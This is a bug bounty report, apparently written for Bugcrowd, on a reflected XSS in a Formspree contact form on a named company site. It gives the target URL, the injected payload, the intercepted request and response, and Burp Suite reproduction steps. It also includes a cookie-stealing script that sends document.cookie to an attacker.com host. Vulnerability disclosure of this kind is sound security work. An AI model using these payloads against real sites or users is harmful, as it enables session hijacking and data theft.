-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathReport for Bugcrowd
197 lines (114 loc) · 10.1 KB
/
Report for Bugcrowd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
## Summary
A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the Formspree contact form on the biocorellc.com website. The `message` parameter does not properly sanitize user inputs, allowing for arbitrary JavaScript code execution in the context of the user's browser.
## Affected URL
`https://biocorellc.com/services-capabilities/analytics-ai-machine-learning`
## Vulnerable Parameter
`message`
## Payload
`asd'); alert(document.cookie); //`
## Steps to Reproduce
1. **Navigate to the affected URL.**
- Visit the following page: `https://biocorellc.com/services-capabilities/analytics-ai-machine-learning`.
2. **Open the contact form.**
- Scroll down to the contact form section of the page.
3. **Intercept the form submission using a proxy tool like Burp Suite.**
- Configure your browser to use Burp Suite as a proxy.
- Fill out the contact form with any dummy data in all fields.
- Submit the form and intercept the request in Burp Suite.
4. **Modify the `message` parameter in the intercepted request to include the payload:**
- In Burp Suite, locate the intercepted POST request.
- Modify the `message` parameter to include the payload:
`asd'); alert(document.cookie); //`
5. **Forward the modified request.**
- Forward the modified request to the server.
6. **Observe the JavaScript execu``tion.**
- The browser will execute the injected JavaScript payload.
- An alert box will display the content of `document.cookie`, confirming the XSS vulnerability.
## Evidence
### Intercepted Request
e
`POST /f/xbjvyola HTTP/2 Host: formspree.io Content-Type: application/x-www-form-urlencoded Content-Length: 169 first-name=John&last-name=Doe&company=Test&[email protected]&phone-number=1234567890&message=asd'); alert(document.cookie); //&other-fields=test`
### Server Response
`HTTP/2 200 OK Date: Tue, 09 Jul 2024 13:54:28 GMT Content-Type: text/html; charset=utf-8 ... <script type="ca5a2d37d431a14461da3a46-text/javascript"> var appendField = function (form, key, value) { var textarea = document.createElement('textarea') textarea.setAttribute('name', key) textarea.innerHTML = value textarea.setAttribute('style', 'display:none') form.appendChild(textarea) } var success = function (response) { var form = document.querySelector('#passthrough') try { // remove data from sessionStorage sessionStorage.removeItem('data') sessionStorage.removeItem('sorted_keys') } catch (e) { } // handles the case where user has a button named 'submit' document.createElement('form').submit.call(form) } function onloadCallback () { var form = document.querySelector('#passthrough') var data = {"_referrer": "https://biocorellc.com/services-capabilities/analytics-ai-machine-learning", "_submission_ip": "127.0.0.1", "_submission_nonce": "17325d6a-bb11-4bf3-984c-9c3ebbfbbd1c", "company": "Test", "email": "[email protected]", "first-name": "John", "form-name": "Data Analytics Form", "ip-address": "52.91.21.77", "last-name": "Doe", "message": "asd'); alert(document.cookie); //", "other-fields": "test", "phone-number": "1234567890"} var keys = ["first-name", "last-name", "company", "email", "phone-number", "message", "other-fields", "ip-address", "form-name"] try { if (sessionStorage.getItem('data')) { if (Object.keys(data).length > 1) { // if data is valid overwrite current storage sessionStorage.setItem('data', JSON.stringify(data)) sessionStorage.setItem('sorted_keys', JSON.stringify(keys)) } else { // passed in blank data except submission_nonce data = JSON.parse(sessionStorage.getItem('data')) keys = JSON.parse(sessionStorage.getItem('sorted_keys')) } } else { sessionStorage.setItem('data', JSON.stringify(data)) sessionStorage.setItem('sorted_keys', JSON.stringify(keys)) } } catch (e) { /* Safari for iOS in incognito mode doesn't provide sessionStorage. */ } for (var i = 0; i < keys.length; i++) { var key = keys[i] if (data.hasOwnProperty(key)) { appendField(form, key, data[key]) delete data[key] } } for (var key in data) { if (data.hasOwnProperty(key)) { appendField(form, key, data[key]) } } grecaptcha.render('recaptcha', { 'sitekey': "6LepugcTAAAAAP0ScLpB1xpKEoZx5CdRn4tBtdH4", 'callback': success, 'size': window.innerWidth < 480 ? 'compact' : 'normal', 'hl': "en" }) } </script>`
### Screenshots
1. **Form Submission:**
- Screenshot of the contact form filled with dummy data.
2. **Intercepted Request:**
- Screenshot of the intercepted request in Burp Suite with the modified payload.
3. **Executed Payload:**
- Screenshot of the alert box showing `document.cookie`.
## Impact
The vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to:
- Session hijacking
- Theft of sensitive information
- Phishing attacks
- Unauthorized actions on behalf of the user
## Recommendations
1. **Sanitize and Escape User Inputs:**
- Properly sanitize and escape all user inputs before reflecting them in the response.
2. **Implement Content Security Policy (CSP):**
- Use CSP to mitigate the risk of XSS by restricting the sources from which scripts can be loaded and executed.
3. **Validate and Encode Data:**
- Implement validation and encoding on both client-side and server-side to ensure inputs are safe and properly formatted.
4. **Regular Security Testing:**
- Conduct regular security testing and code reviews to identify and fix potential vulnerabilities.
### Additional Information
- OWASP XSS Prevention Cheat Sheet
- [Content Security Policy (CSP) - MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
By providing detailed and clear information, you will help the security team understand and reproduce the issue, leading to a quicker resolution and patch.
### Potential Exploit Scenario
#### Context:
1. **Form Submission:** The form on `biocorellc.com` uses Formspree.io to handle form submissions. When a user submits the form, the data, including the `message` parameter, is sent to Formspree.io.
2. **Dashboard Handling:** Formspree.io has a dashboard where users (the owners of the forms) can view the submissions they have received.
#### Attack Steps:
1. **Crafting the Malicious Payload:**
- An attacker crafts a payload designed to execute JavaScript when viewed in the Formspree.io dashboard.
- Example payload: `'); alert(document.cookie); //`
2. **Submitting the Form:**
- The attacker submits the form on `biocorellc.com` with the malicious payload in the `message` field.
- The form data is sent to Formspree.io, including the malicious payload.
3. **Viewing the Submission:**
- When the owner of the form logs into the Formspree.io dashboard to view submissions, the dashboard will render the submitted data.
- If the Formspree.io dashboard does not properly sanitize and escape the form data, the JavaScript payload will execute in the context of the owner’s browser.
4. **Exploiting the XSS:**
- The JavaScript payload can perform actions such as:
- Stealing session cookies: `document.cookie`
- Sending HTTP requests to other endpoints to exfiltrate data
- Executing further malicious scripts
- Manipulating the dashboard or performing actions on behalf of the logged-in user
#### Potential Impacts:
1. **Session Hijacking:**
- The attacker can steal the session cookie of the Formspree.io dashboard user and impersonate them.
- This can lead to unauthorized access to sensitive information or administrative functions.
2. **Data Theft:**
- The attacker can access and steal data from the Formspree.io dashboard, including other form submissions.
3. **Phishing and Social Engineering:**
- The attacker can use the stolen session to send phishing messages to other users or perform social engineering attacks.
4. **Further Exploitation:**
- The attacker can inject additional payloads to spread the attack within the organization, potentially compromising more systems or data.
### Example Attack Walkthrough:
1. **Submission with Payload:**
- The attacker fills out the form on `biocorellc.com` with the payload: `'); alert(document.cookie); //` in the `message` field.
- This payload is encoded and submitted to Formspree.io.
2. **Interception and Modification:**
- Using a tool like Burp Suite, the attacker intercepts the form submission request and ensures the payload is correctly formatted and injected.
3. **Dashboard Rendering:**
- When the form owner logs into Formspree.io and views the submission, the payload is executed.
- An alert box displaying `document.cookie` appears, indicating the payload execution.
4. **Cookie Theft:**
- Instead of a simple alert, the payload can be modified to send the cookie to an attacker-controlled server:
javascript
Copy code
`<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>`
5. **Session Hijack:**
- The attacker uses the stolen session cookie to access the Formspree.io dashboard without authentication.
### Mitigations:
1. **Sanitization and Escaping:**
- Ensure all user-submitted data is properly sanitized and escaped before rendering in the dashboard.
2. **Content Security Policy (CSP):**
- Implement a strict CSP to limit the sources from which scripts can be executed.
3. **Input Validation:**
- Validate and sanitize inputs on both client-side and server-side to prevent malicious code from being submitted.
4. **Security Awareness:**
- Educate users and administrators about the risks of XSS and how to recognize suspicious activity.
By reporting this vulnerability, you can help improve the security of Formspree.io and protect users from potential attacks. Make sure to provide detailed evidence and recommendations in your bug report to facilitate a quick and effective resolution.